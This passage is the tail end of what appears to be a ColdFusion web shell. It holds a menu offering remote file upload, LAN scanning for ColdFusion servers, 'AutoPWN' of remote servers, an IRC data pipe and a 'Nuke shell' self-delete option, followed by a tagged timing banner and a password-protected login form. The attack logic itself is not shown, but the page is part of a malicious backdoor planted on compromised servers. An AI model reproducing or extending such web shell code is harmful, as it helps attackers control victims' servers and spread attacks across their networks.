  956. <div id='nav'><a href="#upremote" name="modal">:: Upload files from remote server ::</a></div>
  957. <div id='nav'><a href="#scanlan" name="modal">:: Scan LAN for CF ::</a></div>
  958. <div id='nav'><a href="#autopwn" name="modal">:: AutoPWN remote CF ::</a></div>
  959. <div id='nav'><a href="#irc" name="modal">:: IRC datapipe ::</a></div>
  960. <div id='nav'><a href="#nuke" name="modal">:: Nuke shell ::</a></div>
  961. </div>
  962. </div>
  963. </td></tr>
  964. </table>
  965. <div>
  966. <cfset tickEnd = GetTickCount()>
  967. <cfset loopTime = tickEnd - tickBegin>
  968. <center><pre>XiX<blink>_</blink> | &fnof;uZE | <cfoutput>#loopTime#ms</cfoutput></pre></center>
  969. </cfif>
  970. </div>
  971. <cfif IsUserLoggedIn() eq "No">
  972. <cfform name="LoginForm" method="post" format="html">
  973. <center>
  974. <table border="1" cellpadding="5" cellspacing="0">
  975. <tr>
  976. <td colspan="2" align="center">
  977. <img src="<cfoutput>#icon#</cfoutput>">
  978. </td>
  979. </tr>
  980. <tr valign="top">
  981. <td>UserName</td>
  982. <td>
  983. <cfinput name="UserName" type="text" id="_color" style="background-color:666666; color:White; width:250px; height:25px;">
  984. </td>
  985. </tr>
  986. <tr valign="top">
  987. <td>Password</td>
  988. <td>
  989. <cfinput name="Password" type="password" style="background-color:666666; color:White; width:250px; height:25px;">
  990. </td>
  991. </tr>
  992. <tr valign="top">
  993. <td colspan="2" align="right">
  994. <cfinput class="_btn" type="submit" name="LoginButton" value="Login">
  995. </td>
  996. </tr>
  997. </table>
  998. </center>
  999. </cfform>
  1000. </cfif>
  1001.  
  1002. </body>
  1003.  
  1004. </html>